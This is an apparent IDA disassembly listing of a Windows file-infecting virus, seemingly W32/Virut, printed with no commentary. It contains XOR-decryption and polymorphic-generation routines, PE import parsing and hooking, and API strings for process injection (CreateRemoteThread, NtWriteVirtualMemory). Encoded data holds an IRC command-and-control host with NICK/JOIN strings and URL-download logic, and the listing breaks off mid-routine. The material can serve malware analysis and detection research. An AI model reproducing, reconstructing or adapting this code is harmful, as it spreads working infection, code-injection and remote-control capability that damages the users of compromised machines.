loc_40A400: ; CODE XREF: sub_40A21C+17E�j
; sub_40A21C+181�j ...
lea esi, dword_403435[ebp]
loc_40A406: ; CODE XREF: sub_40A21C+184�j
mov edi, [esp+4]
movsb
movsd
mov ebx, ss:dword_4039B2[ebp]
mov esi, ss:dword_4039B6[ebp]
mov edi, ss:dword_4039BA[ebp]
loc_40A41E: ; CODE XREF: sub_40A3C1+3D�j
pop ebp
retn
sub_40A3C1 endp
; ---------------------------------------------------------------------------
loc_40A420: ; CODE XREF: sub_40A43F+2�p
; sub_40A3C1:loc_40A629�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A21C
loc_40A42F: ; CODE XREF: sub_40A21C+19D�j
; sub_40A21C+1A0�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; END OF FUNCTION CHUNK FOR sub_40A21C
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_40A43F proc near ; CODE XREF: sub_40A3C1+9�p
; seg002:loc_40B0E4�p
xor ecx, ecx
call loc_40A420
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call ss:dword_403540[ebp]
add esp, 20h
retn
sub_40A43F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40A45A proc near ; CODE XREF: sub_40A3C1:loc_40A3E7�p
; sub_40C22E+25B�p
mov dh, dl
mov ecx, 225Fh
loc_40A461: ; CODE XREF: sub_40A45A+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_40A461
retn
sub_40A45A endp
; ---------------------------------------------------------------------------
db 30h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A3C1
loc_40A46A: ; CODE XREF: sub_40A3C1+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, ss:dword_403431[ebp]
xor ecx, ecx
push 1
mov cl, 20h
pop ss:dword_40397E[ebp]
loc_40A491: ; CODE XREF: sub_40A3C1+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add ss:dword_40397E[ebp], edx
loop loc_40A491
push edi
mov byte ptr [ebp+401303h], 1
mov ss:dword_403548[ebp], esi
lea esi, loc_4015BB[ebp]
xor ecx, ecx
lea edi, dword_403558[ebp]
mov cl, 1Eh
call sub_40A824
pop edi
call ss:dword_403594[ebp]
shr eax, 1Fh
jz loc_40A5AA
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov ss:dword_403550[ebp], eax
push 69CEh
push 0
call ss:dword_4035C8[ebp]
test eax, eax
jz loc_40A3EE
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset sub_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_40A3C1
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, loc_401A3D[ebp]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call ss:dword_403550[ebp]
add esp, 20h
test eax, eax
jz loc_40A3EE
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call ss:dword_403550[ebp]
test eax, eax
jz loc_40A3EE
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call ss:dword_403550[ebp]
push 1000Ah
call ss:dword_403550[ebp]
call sub_40A59A
jmp loc_40A3EE
; =============== S U B R O U T I N E =======================================
sub_40A59A proc near ; CODE XREF: seg002:0040A590�p
; sub_40A59A+D�j
push 1
pop ecx
jecxz short locret_40A5A9
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_40A59A
; ---------------------------------------------------------------------------
locret_40A5A9: ; CODE XREF: sub_40A59A+3�j
retn
sub_40A59A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40A3C1
loc_40A5AA: ; CODE XREF: sub_40A3C1+10F�j
cmp ss:dword_403570[ebp], 0
jz loc_40A3EE
call near ptr loc_40A5C1+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_40A5C1: ; CODE XREF: sub_40A3C1+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_40A5DE+5
inc eax
add [ebx], dh
leave
lea edi, dword_4035D0[ebp]
mov cl, 0Bh
xchg eax, ebx
call sub_40A824
loc_40A5DE: ; CODE XREF: sub_40A3C1+209�j
cmp ss:dword_4035F8[ebp], 0
jz loc_40A3EE
mov eax, ss:dword_4035D4[ebp]
push dword ptr [eax+1]
pop ss:dword_403395[ebp]
mov eax, ss:dword_4035E8[ebp]
push dword ptr [eax+1]
pop ss:dword_4033E2[ebp]
mov eax, ss:dword_4035D8[ebp]
push dword ptr [eax+1]
pop ss:dword_4033E9[ebp]
mov ecx, ss:dword_4035DC[ebp]
jecxz short loc_40A629
push dword ptr [ecx+1]
pop ss:dword_4033F6[ebp]
loc_40A629: ; CODE XREF: sub_40A3C1+25D�j
call loc_40A420
lea edi, dword_40364E[ebp]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_40A66E: ; CODE XREF: sub_40A3C1+2B0�j
lodsb
stosw
loop loc_40A66E
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call ss:dword_4035E0[ebp]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call ss:dword_4035E4[ebp]
pop edi
pop ecx
test edi, edi
jz loc_40A3EE
lea esi, sub_401000[ebp]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, offset sub_401000
lea eax, loc_40144C[ebp]
jmp eax
; END OF FUNCTION CHUNK FOR sub_40A3C1
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h, 0E0h, 18h
db 40h ; @
align 2
dw 0FF52h
db 95h ;
dd offset dword_403598+4
db 0E8h, 16h, 0
db 0
align 2
aLookupprivileg db 'LookupPrivilegeValueA',0
dd 4895FF50h, 89004035h, 40354C85h, 6A545000h, 0FFFF6A20h
dd 4035EC95h, 5FC08500h, 6A963F75h, 8B565602h, 52016AD4h
dd 11E8h, 44655300h, 67756265h, 76697250h, 67656C69h, 0FF560065h
dd 40354C95h, 56C48B00h, 56505656h, 0D095FF57h, 83004035h
dd 0FF5710C4h, 40353C95h, 6A006A00h, 7095FF02h, 0B9004035h
dd 128h, 89E12B97h, 5754240Ch, 35AC95FFh, 0F6330040h, 363CA583h
dd 54000040h, 0B095FF57h, 85004035h, 465C74C0h, 7204FE83h
dd 2474FFEEh, 6A006A08h, 0A895FF2Ah, 85004035h, 93DC74C0h
dd 43DE8h, 91C93300h, 853930E3h, 40363Ch, 0C1812875h, 0DAEh
dd 56505450h, 53505051h, 356895FFh, 0C0850040h, 0FF0F7459h
dd 8F082474h, 40363C85h, 0FDACE800h, 0FF53FFFFh, 40353C95h
dd 8198EB00h, 128C4h, 95FF5700h, 40353Ch, 0FFFBE5E9h, 498DFFh
dd 585858h, 29CEh, 0D65h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40A824 proc near ; CODE XREF: sub_40A3C1+100�p
; sub_40A3C1+218�p ...
push ecx
push esi
push ebx
call ss:dword_403548[ebp]
stosd
pop ecx
loc_40A82F: ; CODE XREF: sub_40A824+E�j
lodsb
test al, al
jnz short loc_40A82F
loop sub_40A824
retn
sub_40A824 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremoteth db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya_0 db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_40ABBF proc near ; CODE XREF: seg002:0040AC66�p
; seg002:0040AC77�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_40ABBF endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_40ACA2
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call ss:dword_4035E4[ebp]
pop edi
pop ecx
call ss:dword_40353C[ebp]
test edi, edi
jz short loc_40ACA2
mov ecx, [ebp+401588h]
jecxz short loc_40AC5A
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_40AC5A: ; CODE XREF: seg002:0040AC4C�j
mov eax, ss:dword_4035D4[ebp]
lea ecx, [edi+2394h]
call sub_40ABBF
mov eax, ss:dword_4035E8[ebp]
lea ecx, [edi+23E1h]
call sub_40ABBF
mov eax, ss:dword_4035D8[ebp]
lea ecx, [edi+23E8h]
call sub_40ABBF
mov eax, ss:dword_4035DC[ebp]
test eax, eax
jz short loc_40ACA2
lea ecx, [edi+23F5h]
call sub_40ABBF
loc_40ACA2: ; CODE XREF: seg002:0040AC0C�j
; seg002:0040AC44�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call ss:dword_40353C[ebp]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1A43ED81h, 0FF6A0040h, 1A0E958Dh, 52500040h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 401A54h, 85C720CDh
dd 401A56h, 2A0024h, 16AC35Dh, 33FF016Ah, 0FF0473FFh, 74C08515h
dd 0B68F0h, 0D08B0000h, 3C50035Bh, 1A72B58Dh, 0BA8B0040h
dd 10Ch, 1088A8Bh, 0F8030000h, 8B60CB2Bh, 61A6F3CBh, 0E2470574h
dd 83C2EBF5h, 8B570FC7h, 0CC8B53D4h, 406A5450h, 0FF6A5251h
dd 35F095FFh, 0C4830040h, 74958B0Ch, 2B004035h, 7EA83D7h
dd 6A07C7h, 578900E8h, 1A6AC303h, 9E858h, 428D0000h, 0C9FEAA61h
db 75h, 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_40AD87 proc near ; CODE XREF: sub_40B5F2+1B�p
; sub_40B76A+3�p ...
imul edx, ss:dword_403646[ebp], 8088405h
inc edx
mov ss:dword_403646[ebp], edx
mul edx
retn
sub_40AD87 endp
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401B09h, 364A9D8Bh, 7C830040h, 0F000824h
dd 0B984h, 8EC8100h, 54000002h, 10468h, 9095FF00h, 8B004035h
dd 24848DFCh, 104h, 0E8006A50h, 4, 545256h, 8C95FF57h
dd 33004035h, 4978DC9h, 51000001h, 51026A51h, 68016Ah
dd 52400000h, 355C95FFh, 85960040h, 505B74F6h, 1046854h
dd 0FF570000h, 22024B4h, 95FF0000h, 403628h, 74C08559h
dd 5014E316h, 6AD48Bh, 56575152h, 35CC95FFh, 85590040h
dd 56D075C0h, 353C95FFh, 578D0040h, 6A575244h, 978D5844h
dd 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h, 356495FFh
dd 0C4810040h, 208h, 82474FFh, 361895FFh, 0FF530040h, 40361895h
dd 4C25D00h, 0A3E8000h, 8B460175h, 4015848Dh, 8D19E300h
dd 40100095h, 56D10300h, 0C084D2FFh, 11F880Fh, 840F0000h
dd 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h, 0F175203Eh
dd 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h, 6A51CEh
dd 0FF535651h, 40361095h, 0C13B5900h, 0DF850Fh, 858D0000h
dd 401DA2h, 0C68006Ah, 50000000h, 1095FF53h, 3D004036h
dd 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh, 0A5850F56h
dd 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h, 0ACF37520h
dd 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h, 203CAC7Fh
dd 7E817C75h, 746820FFh, 81717574h, 3A70037Eh, 68752F2Fh
dd 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h, 4035BCh
dd 5050C033h, 9E85050h, 44000000h, 6C6E776Fh, 64616Fh
dd 362095FFh, 0C0850040h, 0C9333674h, 364A8589h, 68510040h
dd 80000200h, 50565151h, 362495FFh, 958D0040h, 401B03h
dd 54C93350h, 51525051h, 6C95FF51h, 87004035h, 95FF2404h
dd 40353Ch, 8D80C3F8h, 401577h, 53C3F901h, 5754464Fh, 5C455241h
dd 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh, 75435C73h
dd 6E657272h, 72655674h, 6E6F6973h, 7078455Ch, 65726F6Ch
dd 61540072h, 74656772h, 74736F48h, 0FF000200h, 0F0h, 6F727000h
dd 2E6D6978h, 67637269h, 78616C61h, 6C702E79h, 43494E00h
dd 7473204Bh, 74736C66h, 550A7364h, 20524553h, 3032306Dh
dd 20303035h, 202E202Eh, 4F4A2D3Ah, 26204E49h, 74726976h
dd 0E8550A75h, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 401DB4h
mov byte ptr [ebp+401577h], 0
call ss:dword_403594[ebp]
shr eax, 1Fh
jz short loc_40B0A1
push 1Eh
mov esi, ss:dword_403550[ebp]
pop ecx
loc_40B06E: ; CODE XREF: seg002:loc_40B09D�j
lodsb
cmp al, 2Eh
jnz short loc_40B09D
cmp word ptr [esi], 1DFFh
jnz short loc_40B09D
lea edi, [ebp+403640h]
mov esi, [esi+2]
push edi
movsd
movsw
lea eax, [ebp+40336Ah]
pop dword ptr [ebp+403390h]
cli
mov [esi-6], eax
mov word ptr [esi-2], cs
sti
mov cl, 1
loc_40B09D: ; CODE XREF: seg002:0040B071�j
; seg002:0040B078�j
loop loc_40B06E
jmp short loc_40B0E4
; ---------------------------------------------------------------------------
loc_40B0A1: ; CODE XREF: seg002:0040B063�j
lea eax, [ebp+4015B1h]
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
cmp dword ptr [esp+8], 4
jnz short loc_40B0E4
call near ptr loc_40B0C1+1
push ebx
inc esi
inc ebx
loc_40B0C1: ; CODE XREF: seg002:0040B0B9�p
add bh, bh
xchg eax, ebp
mov ds:48E80040h, dh
cld
; ---------------------------------------------------------------------------
db 0FFh
dd 7E8FFh, 46530000h, 534F5F43h, 8895FF00h, 0E8004035h
dd 0FFFFFC31h
; ---------------------------------------------------------------------------
loc_40B0E4: ; CODE XREF: seg002:0040B09F�j
; seg002:0040B0B7�j
call sub_40A43F
dec dword ptr [ebp+401303h]
call near ptr loc_40B0FE+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_40B0FE: ; CODE XREF: seg002:0040B0EF�p
add bh, bh
xchg eax, ebp
pushf
xor eax, 0AE80040h
; ---------------------------------------------------------------------------
db 0
dd 73770000h, 6E697270h, 416674h, 4895FF50h, 89004035h
dd 40355485h, 8D310F00h, 4018E08Dh, 46858900h, 51004036h
dd 359C95FFh, 68930040h, 4, 18EDB58Dh, 8D590040h, 40362CBDh
dd 0F6D6E800h, 0C766FFFFh, 401D6785h, 83F0FF00h, 401D69A5h
dd 958D0000h, 401D27h, 16A5450h, 6852006Ah, 80000002h
dd 363095FFh, 0C0850040h, 8D22755Ah, 401D5A8Dh, 66A5200h
dd 1D67B58Dh, 56540040h, 52515050h, 363495FFh, 0FF580040h
dd 40362C95h, 4D85C600h, 4038h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 9C95FF00h, 93004035h, 768h, 44B58D00h, 59004018h
dd 35FCBD8Dh, 51E80040h, 0E8FFFFF6h, 0Ch, 494E4957h, 2E54454Eh
dd 4C4C44h, 359C95FFh, 0C0850040h, 1E7840Fh, 68930000h
dd 5, 1882B58Dh, 8D590040h, 403618BDh, 0F61AE800h, 0BD83FFFFh
dd 40361Ch, 0C2840F00h, 81000001h, 190ECh, 1685400h, 0FF000001h
dd 4035FC95h, 90C48100h, 50000001h, 6AD48Bh, 1C95FF52h
dd 85004036h, 0D7559C0h, 138868h, 0BC95FF00h, 0EB004035h
dd 69BD83E2h, 401Dh, 858D2975h, 401D6Dh, 895FF50h, 85004036h
dd 3B840FC0h, 8B000001h, 8B0C40h, 858F30FFh, 401D69h, 384D85C6h
dd 6A010040h, 6A016A00h, 1495FF02h, 83004036h, 840FFFF8h
dd 112h, 65958D93h, 6A00401Dh, 0FF535210h, 40360495h, 0FC08500h
dd 0F285h, 86BD8D00h, 0B100401Dh, 0FABCE808h, 9468FFFFh
dd 5E000000h, 3489E62Bh, 95FF5424h, 403598h, 1D94BD8Dh
dd 1B10040h, 0FFFA9DE8h, 24448BFFh, 8E0C110h, 424440Bh
dd 0B08E0C1h, 50082444h, 5E8h, 362E2500h, 0FF570078h, 40355495h
dd 0CC48300h, 200647C6h, 1D81958Dh, 6A0040h, 2168h, 0FF535200h
dd 40361095h, 247C8D00h, 95FF5714h, 403558h, 0A3804C6h
dd 50006A40h, 95FF5357h, 403610h, 0BD8DE603h, 401DA2h
dd 0C68006Ah, 57000000h, 1095FF53h, 3D004036h, 0Ch, 0B58D4D75h
dd 40364Eh, 384D8D8Dh, 0CE2B0040h, 5651006Ah, 0C95FF53h
dd 83004036h, 2F7E00F8h, 8DFE8B91h, 40364EB5h, 0F20DB000h
dd 601075AEh, 0FFFAF8E8h, 177261FFh, 778D09E3h, 8BEAEB01h
dd 8DCE2BCFh, 40364EBDh, 87A4F300h, 53B9EBF7h, 360095FFh
dd 0BD800040h, 401577h, 682A7401h, 7530h, 35BC95FFh, 0BD800040h
dd 40384Dh, 0C7117400h, 401D6985h, 0
dd 4D85C600h, 4038h, 0FFFE56E9h, 8085C7FFh, 4015h, 5D800000h
dd 0D0004C2h, 6E204F0Ah, 206E6F6Fh, 6C20666Fh, 21656669h
dd 74204F20h, 20656D69h, 63206F74h, 62656C65h, 65746172h
dd 200A0D21h, 20202020h, 7573204Fh, 72656D6Dh, 72616720h
dd 216E6564h, 65520A0Dh, 746E656Ch, 7373656Ch, 6820796Ch
dd 79707061h, 646E6120h, 70786520h, 61746365h, 202C746Eh
dd 6E617473h, 676E6964h, 0D2D203Ah, 7461570Ah, 6E696863h
dd 6C612067h, 6164206Ch, 6E612079h, 696E2064h, 2C746867h
dd 726F6620h, 69726620h, 73646E65h, 77204920h, 3A746961h
dd 68570A0Dh, 20657265h, 20657261h, 2C756F79h, 69726620h
dd 73646E65h, 6F43203Fh, 2021656Dh, 69207449h, 69742073h
dd 2021656Dh, 73277449h, 74616C20h, 0A0D2165h, 30C78404h
dd 4FD479EDh, 2FF61F75h, 4FD47A03h, 50B7AB4h, 40375248h
dd 57401CEAh, 10A61429h, 10A61413h, 40375232h, 0D8B8B352h
dd 53AF69C9h, 27B1FAE5h, 53AF69DFh, 606EF96Ah, 3AAB5957h
dd 354522DFh, 6299AD47h, 0C26CCC5Ch, 1A73C17Eh, 0Ch dup(0)
; =============== S U B R O U T I N E =======================================
sub_40B53C proc near ; CODE XREF: sub_40B583:loc_40B5E0�p
; sub_40B643+7�p ...
arg_0 = dword ptr 4
pusha
and ss:dword_4039A6[ebp], 0
and ss:dword_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_40B558: ; CODE XREF: sub_40B53C+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_40B57A
cmp eax, [edx+8]
jnb short loc_40B57A
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov ss:dword_4039A6[ebp], edx
mov ss:dword_4039AA[ebp], eax
jmp short loc_40B57F
; ---------------------------------------------------------------------------
loc_40B57A: ; CODE XREF: sub_40B53C+23�j
; sub_40B53C+28�j
add edx, 28h
loop loc_40B558
loc_40B57F: ; CODE XREF: sub_40B53C+3C�j
popa
retn 4
sub_40B53C endp
; =============== S U B R O U T I N E =======================================
sub_40B583 proc near ; CODE XREF: seg002:0040B8AF�p
; seg002:0040B8D5�p
mov byte ptr ss:loc_4022F7[ebp], al
call sub_40B5F2
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_40B59A: ; CODE XREF: sub_40B583+1E�j
cmp [eax], ebx
jz short loc_40B5AA
add eax, 4
loop loc_40B59A
inc ss:dword_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_40B5AA: ; CODE XREF: sub_40B583+19�j
neg ecx
add ecx, dword ptr ss:loc_4022F7[ebp]
jecxz short loc_40B5C4
loc_40B5B4: ; CODE XREF: sub_40B583+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_40B5B4
mov [ebp+402224h], ebx
loc_40B5C4: ; CODE XREF: sub_40B583+2F�j
; sub_40B5F2+34�j
cmp dword ptr [edx], 0
jz short loc_40B5CE
sub esi, [edx]
add esi, [edx+10h]
loc_40B5CE: ; CODE XREF: sub_40B583+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_40B5DD
push dword ptr [edx]
jmp short loc_40B5E0
; ---------------------------------------------------------------------------
loc_40B5DD: ; CODE XREF: sub_40B583+54�j
push dword ptr [edx+10h]
loc_40B5E0: ; CODE XREF: sub_40B583+58�j
call sub_40B53C
sub ecx, esi
sub ecx, ss:dword_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_40B583 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B5F2 proc near ; CODE XREF: sub_40B583+6�p
pop ss:dword_403992[ebp]
mov ss:dword_40398E[ebp], 0
call sub_40B643
mov eax, ss:dword_40398E[ebp]
call sub_40AD87
call sub_40B62F
cmp ss:dword_40398E[ebp], 0
jnz short loc_40B628
mov dword ptr ss:sub_4022A0[ebp], ebx
jmp short loc_40B5C4
; ---------------------------------------------------------------------------
loc_40B628: ; CODE XREF: sub_40B5F2+2C�j
dec ss:dword_40398E[ebp]
retn
sub_40B5F2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B62F proc near ; CODE XREF: sub_40B5F2+20�p
pop ss:dword_403992[ebp]
mov ss:dword_40398E[ebp], edx
call sub_40B643
xor ecx, ecx
retn
sub_40B62F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B643 proc near ; CODE XREF: sub_40B5F2+10�p
; sub_40B62F+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_40B53C
add edx, ss:dword_4039AA[ebp]
add edx, esi
loc_40B657: ; CODE XREF: sub_40B643+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_40B768
cmp dword ptr [edx+10h], 0
jz locret_40B768
mov eax, [edx+0Ch]
push eax
call sub_40B53C
add eax, ss:dword_4039AA[ebp]
add eax, esi
push eax
loc_40B67D: ; CODE XREF: sub_40B643+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_40B69D
cmp cl, 2Eh
jz short loc_40B68C
loc_40B689: ; CODE XREF: sub_40B643+58�j
inc eax
jmp short loc_40B67D
; ---------------------------------------------------------------------------
loc_40B68C: ; CODE XREF: sub_40B643+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_40B689
loc_40B69D: ; CODE XREF: sub_40B643+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_40B760
cmp word ptr [eax-2], 3233h
jnz loc_40B760
push esi
cmp dword ptr [edx], 0
jnz short loc_40B6C0
mov ecx, [edx+10h]
jmp short loc_40B6C2
; ---------------------------------------------------------------------------
loc_40B6C0: ; CODE XREF: sub_40B643+76�j
mov ecx, [edx]
loc_40B6C2: ; CODE XREF: sub_40B643+7B�j
add esi, ecx
push ecx
call sub_40B53C
add esi, ss:dword_4039AA[ebp]
loc_40B6D0: ; CODE XREF: sub_40B643+90�j
; sub_40B643+117�j
lodsd
test eax, eax
js short loc_40B6D0
jz loc_40B75F
push ss:dword_4039AA[ebp]
push eax
call sub_40B53C
add eax, ss:dword_4039AA[ebp]
pop ss:dword_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_40B6FC: ; CODE XREF: sub_40B643+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_40B713
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_40B6FC
; ---------------------------------------------------------------------------
loc_40B713: ; CODE XREF: sub_40B643+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_40B759
cmp ebx, 0DB6E45A8h
jz short loc_40B759
cmp ebx, 0FFA13B59h
jz short loc_40B759
cmp ebx, 0ACB522D6h
jz short loc_40B759
cmp ebx, 0F358E993h
jz short loc_40B759
cmp ebx, 0F358E97Dh
jz short loc_40B759
cmp ebx, 0E1253F46h
jz short loc_40B759
cmp ebx, 0E1253F30h
jz short loc_40B759
call ss:dword_403992[ebp]
loc_40B759: ; CODE XREF: sub_40B643+D6�j
; sub_40B643+DE�j ...
pop ebx
jmp loc_40B6D0
; ---------------------------------------------------------------------------
loc_40B75F: ; CODE XREF: sub_40B643+92�j
pop esi
loc_40B760: ; CODE XREF: sub_40B643+60�j
; sub_40B643+6C�j
add edx, 14h
jmp loc_40B657
; ---------------------------------------------------------------------------
locret_40B768: ; CODE XREF: sub_40B643+18�j
; sub_40B643+22�j
retn
sub_40B643 endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_40B76A proc near ; CODE XREF: seg002:0040B8A8�p
; seg002:0040B8CE�p
push 4
pop eax
call sub_40AD87
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_40AD87
add edx, 8
xchg edx, ecx
loc_40B792: ; CODE XREF: sub_40B76A:loc_40B7D1�j
push 5
pop eax
call sub_40AD87
cmp dl, 3
jnb short loc_40B7AA
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_40B7D1
; ---------------------------------------------------------------------------
loc_40B7AA: ; CODE XREF: sub_40B76A+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_40B7CB
mov al, 11h
call sub_40AD87
mov eax, 1
